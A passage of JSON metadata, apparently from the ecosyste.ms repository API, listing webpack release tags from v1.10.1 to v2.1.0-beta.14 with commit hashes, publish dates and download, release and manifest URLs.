beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.1/manifests"},{"name":"v2.1.0-beta.7","sha":"9162f9e6eea62137139f95b8aaedee335c870edd","kind":"tag","published_at":"2016-05-06T22:00:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.7/manifests"},{"name":"v2.1.0-beta.6","sha":"ca8b693c2c17bd06778476381fae23b3b21c0475","kind":"tag","published_at":"2016-04-21T23:03:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.6/manifests"},{"name":"v1.13.0","sha":"006d59500de0493c4096d5d4cecd64eb12db2b95","kind":"tag","published_at":"2016-04-15T13:18:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.0/manifests"},{"name":"v1.12.15","sha":"ee1b8c43b474b22a20bfc25daf0ee153dfb2ef9f","kind":"tag","published_at":"2016-04-10T22:47:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.15","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.15/manifests"},{"name":"v2.1.0-beta.5","sha":"54405b59b1dd9724e145d4d16726a926042d0e1d","kind":"tag","published_at":"2016-04-10T22:45:17.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.5/manifests"},{"name":"v2.1.0-beta.4","sha":"c5cc1d25a2a4c0fabdec49a86b3bc62a5d637729","kind":"tag","published_at":"2016-02-24T22:58:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.4/manifests"},{"name":"v2.1.0-beta.3","sha":"13f8b690f0eb9e6058c10631e01e54fb88cd7143","kind":"tag","published_at":"2016-02-22T22:06:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.3/manifests"},{"name":"v1.12.14","sha":"3ed27836b488401a7e9be2de1491a868a8b6f123","kind":"tag","published_at":"2016-02-22T22:04:46.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.14","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.14/manifests"},{"name":"v2.1.0-beta.2","sha":"69d0d2e4cfe9545d530c4e1bcb59ea01969a9908","kind":"tag","published_at":"2016-02-22T14:31:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.2/manifests"},{"name":"v2.1.0-beta.1","sha":"fd1e68f5826743b72590e8a97bcfb3d7f78745dd","kind":"tag","published_at":"2016-02-22T12:29:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.1/manifests"},{"name":"v2.1.0-beta.0","sha":"52822286a347bf525eeab7f035341fc25e857914","kind":"tag","published_at":"2016-02-22T08:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.0/manifests"},{"name":"v1.12.13","sha":"668a5f0bc68cad70c5182ebcab8b3b1a340e038d","kind":"tag","published_at":"2016-02-04T14:41:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.13","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.13/manifests"},{"name":"v2.0.7-beta","sha":"432bf35df499e09585c0efeedb3ddbed337d3ed9","kind":"tag","published_at":"2016-02-04T13:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.7-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.7-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.7-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.7-beta/manifests"},{"name":"v2.0.6-beta","sha":"71f0945a81e83cc87026d62424f504d00dc6aec3","kind":"tag","published_at":"2016-01-30T12:24:07.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.6-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.6-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.6-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.6-beta/manifests"},{"name":"v2.0.5-beta","sha":"ac45c3c1a4c9b51eceecba79c6ae1a60887368de","kind":"tag","published_at":"2016-01-26T17:20:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.5-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.5-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.5-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.5-beta/manifests"},{"name":"v1.12.12","sha":"c0420f1ca8e2a444a5b5192a58d88d8d7d710bb7","kind":"tag","published_at":"2016-01-23T12:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.12/manifests"},{"name":"v2.0.4-beta","sha":"bba8afdeef79a7c6e1be6688107fdff3109463bc","kind":"tag","published_at":"2016-01-21T18:19:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.4-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.4-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.4-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.4-beta/manifests"},{"name":"v2.0.3-beta","sha":"b7754b645e50608165e0a28ca4735cd0efcfa0d9","kind":"tag","published_at":"2016-01-21T18:16:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.3-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.3-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.3-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.3-beta/manifests"},{"name":"v1.12.11","sha":"ab433884f140d694241c54e9c6f9de7f049aec6d","kind":"tag","published_at":"2016-01-11T18:14:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.11/manifests"},{"name":"v1.12.10","sha":"66142f2f89868b8e380c4883513cb974680e20e2","kind":"tag","published_at":"2016-01-06T19:29:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.10/manifests"},{"name":"v2.0.2-beta","sha":"0915889feb8558a07b053010e56748566e108285","kind":"tag","published_at":"2015-12-22T11:53:39.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.2-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.2-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.2-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.2-beta/manifests"},{"name":"v2.0.1-beta","sha":"11932d75a4c8034e5d8afb50985159d33fdb8ddc","kind":"tag","published_at":"2015-11-24T07:28:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.1-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.1-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.1-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.1-beta/manifests"},{"name":"v1.12.9","sha":"9766f2bde3c3f3e7b3b0e914c9cb81ea3a12e823","kind":"tag","published_at":"2015-11-24T07:09:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.9/manifests"},{"name":"v1.12.8","sha":"b59528164913d1234e9dccc55bdfbba2e75767d2","kind":"tag","published_at":"2015-11-20T20:32:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.8/manifests"},{"name":"v1.12.7","sha":"a6c4414a7f38d8098f128bc50e8c83ed4a9de607","kind":"tag","published_at":"2015-11-20T19:32:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.7/manifests"},{"name":"v1.12.6","sha":"7c3e68e8df03cdcef7a6102f61ed4b8cc91cda78","kind":"tag","published_at":"2015-11-14T08:29:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.6/manifests"},{"name":"v1.12.5","sha":"3266bbcd16f8a80c35fcd518bf2fb2fe8997692c","kind":"tag","published_at":"2015-11-13T21:25:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.5/manifests"},{"name":"v1.12.4","sha":"530f669e13770ccf5082f29dbde1b114e6173a07","kind":"tag","published_at":"2015-11-10T20:29:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.4/manifests"},{"name":"v1.12.3","sha":"f3d65ef1b5a6ebba85083536e3a705fe96d31220","kind":"tag","published_at":"2015-11-06T00:10:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.3/manifests"},{"name":"v2.0.0-beta","sha":"b2ba75b4c4360b0f14cb23fdb66355457de6f810","kind":"commit","published_at":"2015-11-01T22:46:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.0.0-beta","html_url":"https://github.com/webpack/webpack/releases/tag/v2.0.0-beta","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.0.0-beta","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.0.0-beta/manifests"},{"name":"v1.12.2","sha":"89fda6a575eb379d974a30a5229d74c77ba35cc5","kind":"tag","published_at":"2015-09-16T21:13:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.2/manifests"},{"name":"v1.12.1","sha":"cfcac5e3b62a52012318204dc798d7394e9ac6a9","kind":"tag","published_at":"2015-09-03T12:26:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.1/manifests"},{"name":"v1.12.0","sha":"f155f32271ff81fee546c86b5685803377cebc09","kind":"tag","published_at":"2015-08-25T08:41:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.12.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.12.0/manifests"},{"name":"v1.11.0","sha":"5335781be8c06c2ff9443431a196f6a94ca80bb3","kind":"tag","published_at":"2015-08-06T11:30:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.11.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.11.0/manifests"},{"name":"v1.10.5","sha":"c4d78f7ca6e4a20e5b68f2720970a08cadb013e4","kind":"tag","published_at":"2015-07-23T22:04:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.5/manifests"},{"name":"v1.10.4","sha":"107aa63c452d46c0628c53b856bd95e7e3d1b4ed","kind":"tag","published_at":"2015-07-23T21:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.4/manifests"},{"name":"v1.10.3","sha":"b99eb70ce63ad33e23e9eef5ee6b4511846acba2","kind":"tag","published_at":"2015-07-22T21:53:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.3/manifests"},{"name":"v1.10.2","sha":"c2a8b8a843609cbeeeafe92f81894dbe306d38a0","kind":"tag","published_at":"2015-07-22T20:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.10.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.10.2/manifests"},{"name":"v1.10.1","sha":"f711f66f4cec8c72ba6a831eba8e662149508951","kind":"tag","published_at":"2015-07-02T13:25:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.10.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.10.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:githu